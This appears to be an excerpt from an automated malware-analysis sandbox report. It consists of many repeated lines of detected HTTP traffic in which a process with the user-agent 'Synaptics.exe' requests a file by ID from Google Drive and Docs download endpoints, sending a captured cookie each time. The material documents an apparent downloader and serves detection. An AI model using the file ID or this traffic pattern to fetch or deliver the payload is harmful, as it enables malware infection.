                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
